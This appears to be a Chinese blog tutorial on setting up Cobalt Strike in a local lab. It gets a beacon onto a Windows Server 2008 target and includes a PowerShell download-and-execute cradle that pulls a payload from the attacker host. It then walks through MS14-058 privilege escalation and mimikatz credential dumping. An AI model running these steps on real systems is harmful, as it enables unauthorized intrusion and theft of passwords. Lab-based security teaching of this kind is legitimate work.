windwos搭建cs并利用

简介: 渗透同一局域网时,如何快速搭建 cobaltstrike 并利用

渗透同一局域网时,如何快速搭建 cobaltstrike 并利用

并非实战,只是讲解一下操作思路。

实验环境:攻击机:win10 ip:192.168.88.207

靶机:2008   ip:192.168.88.250(无杀软,新系统,未打补丁)

并且已经取得 2008 的 webshell


准备材料:Win10 物理机vm

虚拟机(安装 windows server 2008)

Jdk1.8

cobaltstrike 3.14(我一般简称 cs)


下载jdk,理论上任意版本都可以,看自己喜好。

我提供一个 1.8 的下载地址:http://www.onlinedown.net/soft/61003.htm

cs 自行下载

安装好 jdk 之后 java 目录里面有两个文件夹,一个 jdk,一个 jre。

当你以为安装好了,运行一下结果报错了。。。

命令:teamserver 192.168.88.207 orange

解释:就是运行 cobaltstrike 3.14 目录里面的 teamserver.bat 文件 加上自己的 ip 地址 后面orange 是连接密码,这条命令就是启动 teamserver 服务。

这条命令,就是启动这个 teamserver.bat.

这里有个坑 运行就报错,我们需要把 C:\Program Files (x86)\Java\jdk1.8.0_73\jre\bin 里面的server 文件夹,复制一份 到 C:\Program Files (x86)\Java\jre1.8.0_73\bin 里面

然后在运行

这里就是运行成功了。(最小化这个 cmd 框框就行,让他保持在后台运行)

默认端口 50050

可以在 teamserver.bat 里面修改。

我们再打开 cobaltstrike.bat,这个 bat 文件就是客户端。

运行成功后,会打开一个 cmd,和一个 java 的 gui 界面。(最小化 cmd 界面就行,关闭的话Java 的 gui 会同时退出。)

主机我们刚才启动服务器的 IP,192.168.88.207

默认端口 50050

用户名 任意

密码 orange (就是我们刚刚启动服务端 后面自己填的密码)

连接成功后就是这个界面

接下来 我们创建监听端口,就是反弹 shell 监听的端口。

最后点击保存。

创建好之后我们再来创建一条 cmd 命令用来反弹 shell。

由于目标机是 2008 系统,支持 powershell,我们可以创建个 powershell 命令。

点上面那个看起来很可爱的 cmd 小图标,我们配置一下 木马的下载端口

然后点击开始

我们复制里面的内容。命令解释:就是通过 powershell 命令,下载并运行我们的木马。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.88.207:8881/a'))"

复制到菜刀里面运行。执行完毕之后,我们可以看到 cs 里面上线了一台主机。

可以看到,当前权限比较低。

查看系统,没有打补丁

可以尝试利用 cs 的自带的 ms14-058 模块提权,选中这个会话,右键选中提权。

Ms14-058 就可以了,点击开始后,稍等几十秒。

我们可以看到,一个 system 权限的会话反弹回来了。

由于 shell 默认是 60 秒返回一次数据,太久,我们可以设置 sleep 为 5 秒。这样设置之后执行命令就快了,方便操作。不然的话 每次执行命令都要间隔 60 秒,这谁能忍?

选中需要设置的会话,右击进入 beacon。输入 sleep 5 就差不多了。

然后,我们 run 咪咪卡兔子就可以得到以明文显示的管理员账号密码了。。

这里补充一个知识点:

读取密码明文密码的原理大概就是:

Windows 系统,在用户登录之后,用户的账号密码会以某种加密形式保留在 lsass.exe 这个进程的内存中,而这个加密算法是可逆的 能被解密出明文。mimikatz 就是读取进程内存获取密码的。

这个进程是 system 系统权限运行的,所以我们如果想要读取 lsass.exe 的内存,就需要以管理员权限或者 system 权限来运行 mimikatz 才能读取到密码。

这 cs 跟远控原理差不多,但远远比远控的功能强大!远控有的功能 cs 都有。例如:端口转发,socks 代理,截屏,文件管理,键盘记录,执行命令,。

远控没有功能的 cs 也有,例如:提权,扫描目标内网, 又或者像 burp 那样,可以自己添加插件,牛批的话可以自己写插件,扩展性极强。行了吹不下去了。

上面的也简单,基础用法。

相关文章
|
安全 Linux Shell
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
2558 0
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件
|
供应链 中间件
哥斯拉内存马/Suo5内存代理插件
哥斯拉内存马/Suo5内存代理插件
1417 0
|
安全 Java API
解决 Swagger API 未授权访问漏洞:完善分析与解决方案
Swagger 是一个用于设计、构建、文档化和使用 RESTful 风格的 Web 服务的开源软件框架。它通过提供一个交互式文档页面,让开发者可以更方便地查看和测试 API 接口。然而,在一些情况下,未经授权的访问可能会导致安全漏洞。本文将介绍如何解决 Swagger API 未授权访问漏洞问题。
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
7578 0
|
安全 Linux 网络安全
【工具使用】几款优秀的SSH连接客户端软件工具推荐FinalShell、Xshell、MobaXterm、OpenSSH、PUTTY、Terminus、mRemoteNG、Terminals等
【工具使用】几款优秀的SSH连接客户端软件工具推荐FinalShell、Xshell、MobaXterm、OpenSSH、PUTTY、Terminus、mRemoteNG、Terminals等
117392 0
|
安全 关系型数据库 MySQL
记一次MS14-058到域控实战记录
记一次MS14-058到域控实战记录
490 0
记一次MS14-058到域控实战记录
针对一个红队病毒样本逆向分析
近日翻到一个比较新颖的样本,在最终后门载荷释放前运用了不少免杀手段,包括堆栈欺骗,实现反射性调用API,以及DLL侧加载、DLL挖空、HOOK规避等手法,对其执行流程和部分手法做详细分析记录。
|
Docker 容器
docker 换国内镜像源,docker换源
docker 换国内镜像源,docker换源
9832 5
|
安全 算法 应用服务中间件
SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】
SSL/TLS协议信息泄露漏洞(CVE-2016-2183)【原理扫描】 【可验证】 详细描述TLS是安全传输层协议,用于在两个通信应用程序之间提供保密性和数据完整性。
8717 2